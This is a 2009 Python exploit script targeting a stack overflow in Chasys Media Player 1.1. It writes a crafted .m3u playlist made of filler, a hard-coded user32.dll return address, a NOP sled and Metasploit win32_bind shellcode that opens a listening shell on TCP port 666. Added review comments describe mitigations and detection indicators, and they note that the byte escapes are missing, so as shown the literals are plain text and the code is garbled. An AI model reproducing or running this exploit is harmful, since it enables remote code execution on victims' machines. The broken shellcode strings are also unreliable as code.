
# Title : Chasys Media Player 1.1 (.m3u) Stack Overflow Exploit
# Published : 2009-03-18
# Author : Encrypt3d.M!nd


#!/usr/bin/python
# Chasys Media Player 1.1 (.m3u) Stack Overflow Exploit
# By: Encrypt3d.M!nd
#
# Credit goes to: zAx
#
# The notable thing about this one is that the program does not crash
# when the playlist file is imported; it keeps running.


# Components of the crafted playlist. The final statement of the script joins
# them in this order: header, filler, return-address value, padding, payload.
# NOTE(review): none of the string literals on this page contain backslash
# escapes, so as written they are plain ASCII text rather than raw bytes.

# Extended-M3U marker that opens the playlist file.
header = "#EXTM3Un"
# Filler token repeated 260 times. Presumably this is the distance from the
# start of the overflowed stack buffer to the saved return address; that
# cannot be confirmed from this page alone.
junk = "x41"*260

# Value written over the saved return address. Per the author's comment it is
# a hard-coded location inside user32.dll on Windows XP SP2, so it is tied to
# that one DLL build. Address randomisation (ASLR), stack cookies and DEP on
# later Windows builds are the standard mitigations for this pattern.
eip = "x2bx2ax49x7e" #user32.dll win/xp sp2

# Padding token repeated 20 times, placed between the return-address value
# and the payload.
nops = "x90" * 20


# win32_bind -  EXITFUNC=seh LPORT=666 Size=344 Encoder=PexFnstenvSub http://metasploit.com
# Payload blob appended after the padding. The generator comment that precedes
# this assignment identifies it as a Metasploit "win32_bind" payload
# (EXITFUNC=seh, LPORT=666, 344 bytes, PexFnstenvSub encoder), i.e. code that
# opens a listening TCP port on the victim host.
# NOTE(review): the blob is opaque and was not decoded or verified in this
# review; the description above rests only on that comment. As rendered here
# the literals hold no backslash escapes, so the string is ASCII text, not the
# 344 bytes the comment describes.
# Detection notes: because the payload is encoder-wrapped, static signatures
# on the decoded bytes will not match the file; host-side indicators are a
# media-player process opening a listener on TCP 666 or spawning a shell.
shellcode = (
"x29xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x77"
"x13x35x14x83xebxfcxe2xf4x8bx79xdex59x9fxeaxcaxeb"
"x88x73xbex78x53x37xbex51x4bx98x49x11x0fx12xdax9f"
"x38x0bxbex4bx57x12xdex5dxfcx27xbex15x99x22xf5x8d"
"xdbx97xf5x60x70xd2xffx19x76xd1xdexe0x4cx47x11x3c"
"x02xf6xbex4bx53x12xdex72xfcx1fx7ex9fx28x0fx34xff"
"x74x3fxbex9dx1bx37x29x75xb4x22xeex70xfcx50x05x9f"
"x37x1fxbex64x6bxbexbex54x7fx4dx5dx9ax39x1dxd9x44"
"x88xc5x53x47x11x7bx06x26x1fx64x46x26x28x47xcaxc4"
"x1fxd8xd8xe8x4cx43xcaxc2x28x9axd0x72xf6xfex3dx16"
"x22x79x37xebxa7x7bxecx1dx82xbex62xebxa1x40x66x47"
"x24x40x76x47x34x40xcaxc4x11x7bx37x8ex11x40xbcxf5"
"xe2x7bx91x0ex07xd4x62xebxa1x79x25x45x22xecxe5x7c"
"xd3xbex1bxfdx20xecxe3x47x22xecxe5x7cx92x5axb3x5d"
"x20xecxe3x44x23x47x60xebxa7x80x5dxf3x0exd5x4cx43"
"x88xc5x60xebxa7x75x5fx70x11x7bx56x79xfexf6x5fx44"
"x2ex3axf9x9dx90x79x71x9dx95x22xf5xe7xddxedx77x39"
"x89x51x19x87xfax69x0dxbfxdcxb8x5dx66x89xa0x23xeb"
"x02x57xcaxc2x2cx44x67x45x26x42x5fx15x26x42x60x45"
"x88xc3x5dxb9xaex16xfbx47x88xc5x5fxebx88x24xcaxc4"
"xfcx44xc9x97xb3x77xcaxc2x25xecxe5x7cx87x99x31x4b"
"x24xecxe3xebxa7x13x35x14")

# Join the parts in their fixed order (marker, filler, return-address value,
# padding, payload) and write the result to devil_inside.m3u in the current
# directory, replacing any existing file of that name.
# Detection note: the output is a playlist whose content after the #EXTM3U
# marker is one unbroken run far longer than a normal path or URL entry, so an
# overlong-entry check on .m3u files flags it before a player parses it.
ex = "".join((header, junk, eip, nops, shellcode))
with open("devil_inside.m3u", "w") as playlist:
    playlist.write(ex)
